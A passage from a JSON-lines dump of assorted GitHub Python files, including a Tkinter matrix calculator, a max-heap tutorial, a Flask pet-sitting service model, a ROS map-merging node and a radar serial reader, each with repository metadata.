\"Determinante = \\t\")\n t.insert(END, res)\n t.insert(END, \"\\n\")\n else:\n t.insert(END, \"La matriz no es cuadrada \\n\")\n\n\ndef eigVal(Nombre):\n fila = len(diccionario[Nombre])\n columna = len(diccionario[Nombre][0])\n if columna == fila:\n t.insert(END, \"\\n\")\n m = Matrix(diccionario[Nombre])\n res = m.eigenvals()\n t.insert(END, \"Eigen Valores = \\t\")\n t.insert(END, res)\n t.insert(END, \"\\n\")\n else:\n t.insert(END, \"La matriz no es cuadrada \\n\")\n \n\ndef eigVect(Nombre):\n fila = len(diccionario[Nombre])\n columna = len(diccionario[Nombre][0])\n if columna == fila:\n t.insert(END, \"\\n\")\n m = Matrix(diccionario[Nombre])\n res = m.eigenvects()\n t.insert(END, \"Eigen Valores = \\n\")\n t.insert(END, res)\n t.insert(END, \"\\n\")\n nuevoNombre = \"EigVector(\" + Nombre + \")\"\n guardar(m, nuevoNombre)\n else:\n t.insert(END, \"La matriz no es cuadrada \\n\")\n\n\ndef Inversa(Nombre):\n m = Matrix(diccionario[Nombre])\n try:\n res = m.inv()\n except:\n t.insert(END, \"det = 0, la matriz no tiene inversa\\n\")\n c = trans(res)\n t.insert(END, \"\\n\")\n t.insert(END, \"Resultado de la inversa = \\t\")\n t.insert(END, \"\\n\")\n nuevoNombre = Nombre + \"^-1\"\n mostrar(c, nuevoNombre)\n guardar(c, nuevoNombre)\n\n\ndef Suma(Nombre):\n m = Matrix(diccionario[Nombre])\n f = Toplevel()\n scrl = Scrollbar(f)\n l = Listbox(f, yscrollcommand=scrl)\n l.grid(row=1, column=0)\n scrl.config(command=l.yview)\n scrl.grid(row=1, column=1)\n btn = Button(f, text=\"Sumar\", command=lambda: Operacion(m, l.get(l.curselection()), Nombre))\n btn.grid(row=2, column=0)\n l.bind('<>', onSelect)\n for item in diccionario:\n l.insert(END, item)\n\n def Operacion(m, Nombre2, Nombre):\n m2 = Matrix(diccionario[Nombre2])\n \n res = m + m2\n c = trans(res)\n \n nuevoNombre = Nombre + \" + \" + Nombre2\n \n mostrar(c, nuevoNombre)\n t.insert(END, \"\\n\")\n guardar(c, nuevoNombre)\n f.destroy()\n t.insert(END, \"\\n\")\n\n\ndef Resta(Nombre):\n m = Matrix(diccionario[Nombre])\n f = Toplevel()\n scrl = Scrollbar(f)\n l = Listbox(f, yscrollcommand=scrl)\n l.grid(row=1, column=0)\n scrl.config(command=l.yview)\n scrl.grid(row=1, column=1)\n btn = Button(f, text=\"Restar\", command=lambda: Operacion(m, l.get(l.curselection()), Nombre))\n btn.grid(row=2, column=0)\n l.bind('<>', onSelect)\n for item in diccionario:\n l.insert(END, item)\n\n def Operacion(m, Nombre2, Nombre):\n m2 = Matrix(diccionario[Nombre2])\n res = m - m2\n c = trans(res)\n nuevoNombre = Nombre + \" - \" + Nombre2\n mostrar(c, nuevoNombre)\n t.insert(END, \"\\n\")\n guardar(c, nuevoNombre)\n f.destroy()\n t.insert(END, \"\\n\")\n\n\ndef Multiplicacion(Nombre):\n m = Matrix(diccionario[Nombre])\n f = Toplevel()\n scrl = Scrollbar(f)\n l = Listbox(f, yscrollcommand=scrl)\n l.grid(row=1, column=0)\n scrl.config(command=l.yview)\n scrl.grid(row=1, column=1)\n btn = Button(f, text=\"Multiplicar\", command=lambda: Operacion(m, l.get(l.curselection()), Nombre))\n btn.grid(row=2, column=0)\n l.bind('<>', onSelect)\n for item in diccionario:\n l.insert(END, item)\n\n def Operacion(m, Nombre2, Nombre):\n m2 = Matrix(diccionario[Nombre2])\n res = m * m2\n c = trans(res)\n \n nuevoNombre = Nombre + \" x \" + Nombre2\n \n mostrar(c, nuevoNombre)\n t.insert(END, \"\\n\")\n guardar(c, nuevoNombre)\n f.destroy()\n t.insert(END, \"\\n\")\n\n\ndef trans(m):\n row = list()\n col = list()\n contador = 1\n j = 0\n for i in range(0, len(m)):\n \n col.insert(contador, m[i])\n if contador == (len(m.row(0))):\n row.insert(j, col)\n col = list()\n j += 1\n contador = 0 \n contador += 1\n return row\n\n\ndef guardar(matrix, Nombre):\n matrices.append(matrix)\n diccionario[Nombre] = matrices[-1]\n lstMatrices.insert(END, Nombre)\n\n\ndef about():\n fx = Toplevel()\n lb = ttk.Label(fx, text=\"creado por Abdul Hamid Achik Lopez\")\n lb.pack(padx=20, pady=20)\n\ndef MultVar(Nombre):\n m = Matrix(diccionario[Nombre])\n f = Toplevel()\n lb = Label(f,text=\"Constante\")\n lb.grid(row=0,column=0)\n ent = ttk.Entry(f,textvariable=5)\n ent.grid(row=1,column=0)\n btn = ttk.Button(f,text=\"Aceptar\", command=lambda: Operacion(m))\n btn.grid(row=2,column=0)\n\n\n def Operacion(Matrix):\n constante = int(Entry.get(ent))\n resultado = Matrix*constante\n res = trans(resultado)\n nuevoNombre = Nombre +\"*\"+ str(constante)\n guardar(res, nuevoNombre)\n f.destroy()\n\ndef guardarFile(texto):\n DAO.agregar(texto)\n\n\n\n\nroot.mainloop() \n","repo_name":"abdul-hamid-achik/Proyecto_Pytrix","sub_path":"Pytrix.py","file_name":"Pytrix.py","file_ext":"py","file_size_in_byte":12376,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"39921319655","text":"\"\"\"\n - Heaps are type of tree which are always the complete binary tree meaning there should not be any nodes left\n - There are 2 types of Heaps: Maxheap and Minheap\n - Maxheap: a given node is always GREATER than all its descendant nodes\n - Minhead: a given node is always SMALLER than all its descendant nodes\n - Duplicates are allowed in Heap contrary to Binary tree where duplicates are not allowed\n - Heaps are represented mostly as an Array in most algorithms\n - Formula to represent heap in an array is:\n node = i\n left_node = 2 * i\n right_node = (2*i) + 1\n - In binary heap, elements are inserted from left to right\n - Heap is not useful for searching purposes\n - Height of Binary Heap is always Log N (meaning it won't increase un-necessarily\"\n - getMax(): It returns the root element of Max Heap. Time Complexity of this operation is O(1).\n - extractMax(): Removes the maximum element from MaxHeap. Time Complexity of this Operation is O(Log n)\n as this operation needs to maintain the heap property (by calling heapify()) after removing root.\n - insert(): Inserting a new key takes O(Log n) time. We add a new key at the end of the tree.\n If new key is smaller than its parent, then we don’t need to do anything. Otherwise,\n we need to traverse up to fix the violated heap property.\n\n\"\"\"\nimport sys\n\n\nclass MaxHeap:\n\n # The constructor initializes the heap with a maxsize entered by the user, size set to 0, all the elements of\n # heap set to 0\n # For the sake of easier calculation of parent and child nodes, we do the indexing from 1 instead\n # of 0. So we fill the 0th index of heap with a garbage value\n def __init__(self, maxsize):\n self.maxsize = maxsize\n self.size = 0\n self.heap = [0] * (self.maxsize + 1)\n self.heap[0] = sys.maxsize\n\n def left_child_pos(self, pos):\n return 2 * pos\n\n def right_child_pos(self, pos):\n return (2 * pos) + 1\n\n def swap(self, fpos, lpos):\n self.heap[fpos], self.heap[lpos] = self.heap[lpos], self.heap[fpos]\n\n # Method to insert a node in the heap. First we increment the size of heap by 1 and insert the element at the end\n # Inserting at the end of the heap will violate the max-heap rule that all max elements should be higher than lower\n # number elements\n # We have to check if the inserted element is greater than its parent(pos: size/2). if inserted element is greater\n # than parent then we swap both of them and keep checking it until we reach at the root node\n def insert(self, element):\n if self.size >= self.maxsize:\n return\n self.size += 1\n self.heap[self.size] = element\n current = self.size\n # check if the element inserted is greater than its parent\n while self.heap[current] > self.heap[current // 2]:\n self.heap[current], self.heap[current // 2] = self.heap[current // 2], self.heap[current]\n current //= 2\n\n def remove_max(self):\n \"\"\"\n In Binary heap, we always delete the root element\n steps to delete and re-arrange/sort binary max heap\n 1. Replace the smallest element with the root element\n 2. compare the child of root node to find the greater element\n 3. swap the greater element with the root node\n 4.\n\n :return:\n \"\"\"\n popped_root_node = self.heap[1]\n self.heap[1] = self.heap[self.size]\n self.heap[self.size] = 0\n self.size -= 1\n self.heapify(1) # First, we always heapify root node whose index = 1\n return popped_root_node\n\n # this method will be called whenever heap property is disturbed and heap needs to be balanced\n # We check if the concerned node is not the leaf node or not the first node. If it is, then no need to do anything\n def heapify(self, position):\n\n # all leaf nodes are at the 2nd half of the array. If the position passed is at the 2nd half of the array,\n # we don't do anything\n if not self.size // 2 < position < self.size:\n\n # check if the node is less than any of the left or right child\n if self.heap[position] < self.heap[self.left_child_pos(position)] or \\\n self.heap[position] < self.heap[self.right_child_pos(position)]:\n\n # check if the left node is greater than right node. If so, swap the node with left node\n if self.heap[self.left_child_pos(position)] > self.heap[self.right_child_pos(position)]:\n self.swap(position, self.left_child_pos(position))\n self.heapify(self.left_child_pos(position))\n\n # else if right child is greater than left child then swap node with the right child\n else:\n self.swap(position, self.right_child_pos(position))\n self.heapify(self.right_child_pos(position))\n\n def print_heap(self):\n for i in range(1, (self.size // 2) + 1):\n print(\n f\"Parent: {self.heap[i]} , Left Child is: {self.heap[2 * i]}, Right Child is: {self.heap[(2 * i) + 1]}\")\n\n\nif __name__ == \"__main__\":\n my_heap = MaxHeap(15)\n my_heap.insert(5)\n my_heap.insert(3)\n my_heap.insert(17)\n my_heap.insert(10)\n my_heap.insert(84)\n my_heap.insert(19)\n my_heap.insert(6)\n my_heap.insert(22)\n my_heap.insert(9)\n\n my_heap.print_heap()\n print(my_heap.heap)\n print(\"**************\")\n print(my_heap.remove_max())\n print(my_heap.heap)\n my_heap.print_heap()\n\n print(\"**************\")\n print(my_heap.remove_max())\n print(my_heap.heap)\n my_heap.print_heap()\n\n\"\"\"\n 84\n 22 19 \n \n 17 10 5 6\n \n3 9\n\nAfter 1st heapify:\n\n 22\n 17 19 \n \n 9 10 5 6\n \n3 \n\nAfter 2nd heapify:\n\n 19\n 17 6 \n \n 9 10 5 3\n\n\"\"\"\n","repo_name":"nikhilx5/Data-Structures-And-Algorithms-using-Python","sub_path":"data_structures/trees/binary_max_heap.py","file_name":"binary_max_heap.py","file_ext":"py","file_size_in_byte":6056,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"17410912686","text":"import json\nimport logging\nimport os\nimport pandas as pd\nimport string\nfrom time import sleep\nfrom stanfordcorenlp import StanfordCoreNLP\nfrom OrganizedBigTable import OrganizedBigTable\nfrom example_config import config\n\nCORE_NLP_PATH = config.get('core_nlp_path')\nSTART_SESSION = config.get('start_session')\nTABLE_PREFIX = config.get('old_table_prefix')\nEND_SESSION = config.get('end_session')\nMEMORY = config.get('java_memory') or '4g'\n\nprops = {'annotators': 'tokenize,ssplit,pos','outputFormat':'json'}\n\ndef parse_pos(client=None):\n local_client = False\n if not client:\n client = StanfordCoreNLP(CORE_NLP_PATH, memory=MEMORY)\n local_client = True\n for i in range(START_SESSION, END_SESSION+1):\n session_number = str(i).zfill(2)\n filename = \"{}_session{}.txt\".format(TABLE_PREFIX, session_number)\n stanford_tag(client, filename)\n sleep(5) # make sure all sessions complete before closing client\n if local_client: # close local client\n client.close()\n\ndef stanford_tag(client, filename):\n\n document = open(filename)\n text = document.read()\n ann = client.annotate(text, properties=props)\n parsed = json.loads(ann)\n words_file_name = '{}_words.txt'.format(os.path.splitext(filename)[0])\n words_file = open(words_file_name, 'w')\n for item in parsed['sentences']:\n for token in item['tokens']:\n word = token['word']\n pos = token['pos']\n words_file.write('{} {}\\n'.format(word, pos))\n\n document.close()\n words_file.close()\n\nif __name__ == '__main__':\n parse_pos()\n","repo_name":"manestay/Text-to-Speech-Prosody-Project","sub_path":"audix/scripts/stanford_pos.py","file_name":"stanford_pos.py","file_ext":"py","file_size_in_byte":1588,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"21523653685","text":"def solution(arr):\n num = max_ = min(arr)\n arr.remove(max_)\n while True:\n flag = True\n for a in arr:\n if num % a != 0:\n flag = False\n break\n if flag:\n return num\n num += max_\n\nif __name__ == \"__main__\":\n print(solution([2, 6, 8, 14]))","repo_name":"837477/Algorithm","sub_path":"Programmers/LEVEL2/N개의 최소공배수.py","file_name":"N개의 최소공배수.py","file_ext":"py","file_size_in_byte":326,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"38954772985","text":"import os\nfrom time import strftime\nfrom optparse import OptionParser\nimport setups\n\n\ndef create_log_dir(lab, logs_dir=None, sub_dir=None, mkdir=True):\n # compute directory for all logs based on resultlog arg, lab, and timestamp on local machine\n logs_dir = logs_dir.strip() if logs_dir else os.path.expanduser(\"~\")\n automation_logs = 'AUTOMATION_LOGS'\n if automation_logs in logs_dir:\n logs_dir = logs_dir.split(sep='/{}'.format(automation_logs))[0]\n if sub_dir:\n automation_logs = os.path.join(automation_logs, sub_dir.strip().lower())\n\n lab = lab.lower().replace('-', '_')\n labname = setups.get_lab_dict(lab).get('short_name').replace('-', '_').lower().strip()\n session_dir = os.path.join(logs_dir, automation_logs, labname, strftime('%Y%m%d%H%M'))\n if mkdir:\n os.makedirs(session_dir, exist_ok=True)\n\n return session_dir\n\n\ndef create_test_log_dir(testname, logs_dir=None):\n\n logs_dir = logs_dir if logs_dir else os.path.expanduser(\"~\")\n if '/AUTOMATION_LOGS' in logs_dir:\n logs_dir = logs_dir.split(sep='/AUTOMATION_LOGS')[0]\n if not logs_dir.endswith('/'):\n logs_dir += '/'\n\n session_dir = logs_dir + \"AUTOMATION_LOGS/\" + testname + '/' + strftime('%Y%m%d%H%M')\n os.makedirs(session_dir, exist_ok=True)\n\n return session_dir\n\n\nif __name__ == '__main__':\n parser = OptionParser()\n parser.add_option('-d', '--dir', action='store', type='string', dest='logs_dir',\n help='home directory for automation logs. e.g., /sandbox')\n parser.add_option('--subdir', '--sub-dir', '--sub_dir', action='store', type='string', dest='sub_dir',\n help='Sub-folder under AUTOMATION_LOGS dir, such as refstack')\n parser.add_option('--nomkdir', '--no-mkdir', action='store_true', dest='no_mkdir', help=\"Don't mkdir\")\n options, args = parser.parse_args()\n auto_home = options.logs_dir\n sub_dir = options.sub_dir\n no_mkdir = options.no_mkdir\n\n log_dir = create_log_dir(lab=args[0], logs_dir=auto_home, sub_dir=sub_dir, mkdir=(not no_mkdir))\n print(log_dir)\n","repo_name":"pvaduva/auto_test","sub_path":"CGCSAuto/utils/jenkins_utils/create_log_dir.py","file_name":"create_log_dir.py","file_ext":"py","file_size_in_byte":2090,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"10100025387","text":"import sys\nfrom collections import deque\nfrom datetime import datetime\nfrom heapq import heappop, heappush\n\ninput = sys.stdin.readline\n\nsys.setrecursionlimit(10**8)\n\ndef solve(idx, num):\n global st, li\n if num > 0:\n st.add(num)\n for i in range(idx, len(li)):\n solve(i+1, num + li[i])\n\n\n# 23057\nst = set()\nN = int(input())\nli = list(map(int, input().split()))\nli.sort()\n\nsolve(0, 0)\nprint(sum(li) - len(st))\n","repo_name":"kyc113212/BOJ","sub_path":"HashMap/23057_ChallengeNumberKing.py","file_name":"23057_ChallengeNumberKing.py","file_ext":"py","file_size_in_byte":430,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"16467438227","text":"\"\"\"\n\n 모든 왼쪽 소괄호는 오른쪽 소괄호와만 짝을 이뤄야 한다.\n 모든 왼쪽 대괄호는 오른쪽 대괄호와만 짝을 이뤄야 한다.\n 모든 오른쪽 괄호들은 자신과 짝을 이룰 수 있는 왼쪽 괄호가 존재한다.\n 모든 괄호들의 짝은 1:1 매칭만 가능하다. 즉, 괄호 하나가 둘 이상의 괄호와 짝지어지지 않는다.\n 짝을 이루는 두 괄호가 있을 때, 그 사이에 있는 문자열도 균형이 잡혀야 한다.\n\n\"\"\"\n\nimport re\nimport sys\n\n\ndef check_bracket(s):\n match = {'(': ')', '[': ']', ')': '(', ']': '['}\n answer = True\n if len(s) == 0:\n return True\n # 여는 괄호를 담는 stack\n open_bracket = []\n for i in s:\n if i == '(' or i == '[':\n open_bracket.append(i)\n else:\n if len(open_bracket) == 0:\n return False\n else:\n if open_bracket[-1] == match[i]:\n open_bracket.pop(-1)\n else:\n return False\n if len(open_bracket) > 0:\n return False\n return answer\n\n\nwhile 1:\n s = input().rstrip()\n\n if s == '.':\n break\n\n s = re.sub('[0-9A-Za-z .]+', '', s)\n\n if check_bracket(s):\n print('yes')\n else:\n print('no')\n","repo_name":"JeongMin-98/StudyForCodingtest","sub_path":"Baekjoon/week2/4949.py","file_name":"4949.py","file_ext":"py","file_size_in_byte":1314,"program_lang":"python","lang":"ko","doc_type":"code","stars":2,"dataset":"github-code","pt":"34"} +{"seq_id":"71198907939","text":"import pandas as pd\nfrom rich.console import Console\nimport click\n\n\nDATASET = \"bad_reviews_refined.csv\" # path to the negative dataset csv \nOUTPUT_FOLDER = \"labelled_dataset\"\n\n\nclass Labeller:\n def __init__(self, dataset_path, start, end, copy=True):\n self.start = start\n self.end = end\n self.size = start-end\n self.dataset_path = dataset_path\n self.dataset = pd.read_csv(DATASET)\n self.dataset = self._parse_dataset()\n\n def save(self, output_folder):\n name = f\"{self.start}-{self.end}_reviews.csv\"\n with open(f\"{output_folder}/{name}\", \"w\") as text_file:\n text_file.write(self.dataset.to_csv(index=False))\n\n def write_labels_interactively(self, feature_column_names, label_column_name):\n labels = []\n console = Console()\n for i, row in self.dataset.iterrows():\n console.print(f\"[bold green]--------------------------------\")\n for feature_name in feature_column_names:\n feature = row[feature_name]\n console.print(f\"[bold yellow] {feature_name} [bold red]{feature}?\")\n\n console.print(f\"[bold green]--------------------------------\")\n label = console.input(f\"[bold blue] Food safety issue (1) or not (0)?\")\n self.dataset.at[i, label_column_name] = label\n \n\n def _parse_dataset(self):\n df = pd.read_csv(DATASET)\n sliced_df = pd.DataFrame(columns=df.columns)\n for i in range(self.start, self.end):\n sliced_df.loc[i] = df.loc[i]\n return sliced_df\n\n\n\n@click.command()\n@click.option('--start', help='Start row index .', type=int)\n@click.option('--end', help='End row index.', type=int)\ndef main(start, end):\n \"\"\"\n A script that allows interactive labelling of a dataset. It saves a copy of the newly labelled dataset into the labelled_dataset folder \n \"\"\"\n labeller = Labeller(DATASET, start, end)\n labeller.write_labels_interactively([\"review_headline\", \"review_body\", \"sentiment_score\"], \"food_safety_flag\")\n labeller.save(OUTPUT_FOLDER)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Yepadee/ads-cwk","sub_path":"labeller.py","file_name":"labeller.py","file_ext":"py","file_size_in_byte":2123,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"71895656416","text":"from flask_app.config.mysqlconnection import connectToMySQL\nfrom flask_app import DATABASE\nfrom flask import flash\nfrom flask_app.models import address,user,pet,sitter\nclass Service:\n def __init__(self, data):\n self.id = data['id']\n self.pet_id = data['pet_id']\n self.sitter_id = data['sitter_id']\n self.start_date = data['start_date']\n self.end_date = data['end_date']\n self.is_boarding = data['is_boarding']\n self.status = data['status']\n self.created_at = data['created_at']\n self.updated_at = data['updated_at']\n @classmethod\n def create_service(cls,data):\n query = \"\"\"\n INSERT INTO services (pet_id, sitter_id, start_date, end_date, is_boarding)\n VALUES (%(pet_id)s, %(sitter_id)s, %(start_date)s, %(end_date)s, %(is_boarding)s);\n \"\"\"\n result = connectToMySQL(DATABASE).query_db(query,data)\n return result\n @classmethod\n def retrive_service(cls,data):\n query= \"\"\"SELECT * from users\n JOIN addresses ON users.address_id = addresses.id\n JOIN pets ON users.id = pets.user_id\n JOIN services ON pets.id = services.pet_id\n JOIN sitters ON sitters.id = services.sitter_id\n WHERE services.sitter_id =%(sitter_id)s\n \"\"\"\n result = connectToMySQL(DATABASE).query_db(query,data)\n all_services = []\n if result:\n for row in result:\n this_service = cls(row)\n user_data = {\n **row,\n \"created_at\": row[\"created_at\"],\n \"updated_at\": row[\"updated_at\"],\n \"id\": row[\"id\"]\n }\n pet_data = {\n **row,\n \"created_at\": row[\"pets.created_at\"],\n \"updated_at\": row[\"pets.updated_at\"],\n \"id\": row[\"pets.id\"]\n }\n address_data = {\n **row,\n \"created_at\": row[\"addresses.created_at\"],\n \"updated_at\": row[\"addresses.updated_at\"],\n \"id\": row[\"addresses.id\"]\n }\n sitter_data = {\n **row,\n \"created_at\": row[\"sitters.created_at\"],\n \"updated_at\": row[\"sitters.updated_at\"],\n \"id\": row[\"sitters.id\"]\n }\n service_data = {\n **row,\n \"created_at\": row[\"services.created_at\"],\n \"updated_at\": row[\"services.updated_at\"],\n \"id\": row[\"services.id\"]\n }\n this_service.sitter = sitter.Sitter(sitter_data)\n this_service.user = user.User(user_data)\n this_service.address = address.Address(address_data)\n this_service.pet = pet.Pet(pet_data)\n this_service.servicet = Service(service_data)\n all_services.append(this_service)\n # print(all_services,\"%%\"*25)\n return all_services\n else:\n return []\n \n @classmethod\n def retrive_service_in_users(cls,data):\n query= \"\"\"\n select * from services \n join sitters on services.sitter_id = sitters.id\n join users on sitters.user_id= users.id\n join pets on services.pet_id = pets.id\n where pets.user_id = %(id)s ;\n \"\"\"\n result = connectToMySQL(DATABASE).query_db(query,data)\n # print(result,'$$'*33)\n all_services = []\n if result:\n for row in result:\n print(\"*\"*22,row[\"user_id\"],\"*\"*22)\n this_service = cls(row)\n pet_data = {\n **row,\n \"created_at\": row[\"pets.created_at\"],\n \"updated_at\": row[\"pets.updated_at\"],\n \"id\": row[\"pets.id\"]\n }\n\n this_service.sitter = user.User.get_by_id({\n 'id':row['user_id']\n })\n # this_service.user = user.User(user_data)\n # this_service.address = address.Address(address_data)\n this_service.pet = pet.Pet(pet_data)\n # this_service.servicet = Service(service_data)\n all_services.append(this_service)\n # print(all_services,\"%%\"*25)\n print(all_services)\n return all_services\n else:\n return []\n \n \n @classmethod\n def update_accept(cls,data):\n query=\"\"\" UPDATE services \n SET status = 'accepted' \n WHERE id=%(id)s \n \n \"\"\"\n result = connectToMySQL(DATABASE).query_db(query,data)\n print(result,'=='*44)\n return result\n \n @classmethod\n def update_decline(cls,data):\n query=\"\"\" UPDATE services \n SET status = 'declined' \n WHERE id=%(id)s \n \n \"\"\"\n result = connectToMySQL(DATABASE).query_db(query,data)\n return result\n \n @classmethod\n def update_completed(cls,data):\n query=\"\"\" UPDATE services \n SET status = 'declined' \n WHERE id=%(id)s \n \n \"\"\"\n result = connectToMySQL(DATABASE).query_db(query,data)\n return result","repo_name":"youssefch2003/Project_Python_2023","sub_path":"flask_app/models/service.py","file_name":"service.py","file_ext":"py","file_size_in_byte":5417,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"33094893253","text":"#! /usr/bin/env python\n\nimport rospy\nimport sys\nimport tf\nimport cv2\nimport math\nimport time\nimport datetime\nimport numpy as np\nimport os\nimport image_registration\nimport glob\n\nfrom nav_msgs.msg import OccupancyGrid, Odometry, MapMetaData\n\n\nclass MapMerge:\n \"\"\"\n Map Merging ROS\n \"\"\"\n\n def __init__(self):\n \"\"\"\n init class to initialise the class\n\n - rate default 10 (script run rate)\n\n - RANSAC parameters:\n - ransacReprojThreshold default 9 ()\n - confidence default 0.99 ()\n \"\"\"\n rospy.init_node('Map Merging Node')\n\n self.ransacReprojThreshold = rospy.get_param(\"~ransacReprojThreshold\", 9)\n self.confidence = rospy.get_param(\"~confidence\", 0.99)\n\n # Script Run Rate\n self.rate = rospy.Rate(rospy.get_param(\"~rate\", 10))\n\n def StartMapMerging(self):\n\n\n rospy.loginfo(\"start Map Merging Node\")\n\n while not rospy.is_shutdown():\n\n # Get list of ROS topics\n list_of_topics = rospy.get_published_topics()\n rospy.loginfo(\"Got {} number of total topics\".format(len(list_of_topics))) \n\n # Look for topics of type nav_msgs/OccupancyGrid\n list_of_map_topics = [] \n for topic in list_of_topics:\n if topic[1] == 'nav_msgs/OccupancyGrid':\n list_of_map_topics.append(topic)\n \n rospy.loginfo(\"Got {} number of map topics\".format(len(list_of_map_topics)))\n\n # Create inputmaps folder\n try:\n path = os.getcwd() + \"/inputmaps\"\n rospy.loginfo(\"Creating path: {0}\".format(path))\n os.makedirs(path)\n except:\n rospy.logerr(\"Failed to create path: {0}\".format(path))\n\n rospy.loginfo(\"Save all the maps\")\n\n # Save all maps using map_server\n for map_topic in list_of_map_topics:\n os.system(\"rosrun map_server map_saver map:=/{0} -f inputmaps/{1}\".\n format(map_topic[0], map_topic[0][1:].replace('/', '_')))\n\n list_of_maps = glob.glob('inputmaps/*.pgm')\n\n # Attempt a map merge\n if len(list_of_maps) != 0:\n # Run merging algorithm\n image_registration.main(list_of_maps, self.ransacReprojThreshold, self.confidence)\n\n self.rate.sleep()\n\n\nif __name__ == \"__main__\":\n\n try:\n map_merger = MapMerge()\n map_merger.StartMapMerging()\n except rospy.ROSInterruptException:\n pass\n\n\n\n \n\n\n\n\n\n","repo_name":"dikokob/DikokoMScEng","sub_path":"multi_robot_map_merging/src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2585,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"9565705313","text":"from litestar import Controller, get\nfrom litestar.di import Provide\n\nfrom internal.dependencies.menu import get_product, get_category\nfrom schemas.menu import CategorySchema, ProductSchema, CategoryListSchema\nfrom repositories.menu import (\n get_all_categories,\n get_products_by_category_slug,\n\n)\n\n\nclass MenuController(Controller):\n path = \"/menu\"\n\n @get()\n async def get_menu(self) -> list[CategoryListSchema]:\n return [\n CategoryListSchema(**category)\n for category in await get_all_categories()\n ]\n\n @get(\"/{category_slug:str}\", dependencies={\"category\": Provide(get_category)})\n async def get_category(self, category: dict) -> CategorySchema:\n return CategorySchema(\n **category,\n products=await get_products_by_category_slug(category[\"slug\"])\n )\n\n @get(\"/{category_slug:str}/{product_slug:str}\", dependencies={'product': Provide(get_product)})\n async def get_product(self, product: dict) -> ProductSchema:\n return ProductSchema(**product)\n","repo_name":"michael7nightingale/litestar-restaurant","sub_path":"src/internal/routes/api/menu.py","file_name":"menu.py","file_ext":"py","file_size_in_byte":1052,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"25993960376","text":"import psycopg2.pool as py\nimport pandas as pd\ndef submit(dsn,sql,File,index=0,position=10000):\n work=pd.read_excel(File,index)\n c=list(work.columns)\n pool=py.ThreadedConnectionPool(1,20,dsn=dsn)\n try:\n conn=pool.getconn()\n with conn.cursor() as cur:\n for i in range(len(work)):\n sorc=work.loc[i]\n data=[]\n for j in range(len(c)):\n if position==j:\n data.append(float(sorc[c[j]]))\n else:\n data.append(str(sorc[c[j]]))\n cur.execute(sql,data)\n conn.commit()\n print('录入成功')\n except:\n conn.rollback()\n print('请修改错误后重新输入')\n raise","repo_name":"jinyuejy/project","sub_path":"database/submitdata.py","file_name":"submitdata.py","file_ext":"py","file_size_in_byte":770,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"26690872077","text":"import csv\n\n\ndef write_error_log(row, csv_file='bad_pdb.csv'):\n \"\"\"\n Csv writer function\n :param row:\n :param csv:\n :return:\n \"\"\"\n with open(csv_file, \"a\") as csv_file:\n writer = csv.writer((csv_file), delimiter=',')\n if isinstance(row, str):\n row = row.split()\n writer.writerow(row)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"Vincentx15/binding-project","sub_path":"Conv3D/data/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":352,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"34"} +{"seq_id":"27355759291","text":"#!/usr/bin/env python\r\n# -*- coding: utf-8 -*-\r\n# @Date : 2017-12-21 20:22:27\r\n# @Author : Zhi Liu (zhiliu.mind@gmail.com)\r\n# @Link : http://blog.csdn.net/enjoyyl\r\n# @Version : $1.0$\r\n\r\nimport numpy as np\r\nimport pytool\r\nfrom pytool.radar.protocol import UpDataType\r\n\r\ncom = 'COM7'\r\nbaudrate = 1050000\r\ntimeout = 0.001\r\ntimesleep = 0.0001\r\n\r\n\r\nSOF = b'$$'\r\nEOF = b'####'\r\n# SOF = '$$'\r\n# EOF = '####'\r\nendian = 'Little'\r\ndtype = type(SOF)\r\n\r\n\r\n# plt.ion()\r\n# fig = plt.figure(0)\r\nserial = pytool.serialopen(com=com, baudrate=baudrate, timeout=timeout)\r\n\r\ncnt = 0\r\nFIR_LEN_MTI = 65\r\n\r\nmtd = np.zeros((FIR_LEN_MTI, 256))\r\n\r\nwhile True:\r\n data = pytool.serialread(serial, size=None, timesleep=timesleep)\r\n if dtype is 'str':\r\n data = data.decode(\"utf-8\")\r\n # print(data)\r\n s, idxHead, idxTail = pytool.findfrm(\r\n data, dtype=dtype, SOF=SOF, EOF=EOF)\r\n\r\n # print(type(data), s, idxHead, idxTail)\r\n data = data[idxHead:idxTail + len(EOF)]\r\n # print(type(data), len(data), idxHead, idxTail)\r\n\r\n Frame = pytool.unpack(\r\n data=data, dtype=dtype, endian='Little', SOF=SOF, EOF=EOF, verbose=True)\r\n\r\n if Frame is None:\r\n continue\r\n\r\n if Frame['DATATYPE'] is UpDataType['UPDT_ORIGECHO']:\r\n IQV, adcmod = pytool.parsing(\r\n Frame=Frame, endian=endian, SOF=None, EOF=None)\r\n if IQV is None:\r\n print(\"IIIIIIIIIIIIIi\")\r\n continue\r\n IQV = np.array(IQV)\r\n x1 = IQV[0] + 1j * IQV[1]\r\n y1 = np.fft.fft(x1)\r\n x2 = IQV[3] + 1j * IQV[4]\r\n y2 = np.fft.fft(x2)\r\n print(cnt)\r\n mtd[cnt, :] = x1\r\n if cnt < FIR_LEN_MTI-1:\r\n cnt = cnt + 1\r\n else:\r\n cnt = 0\r\n # mtd = np.abs(np.fft.fft2(mtd))\r\n pytool.showmtd(mtd, 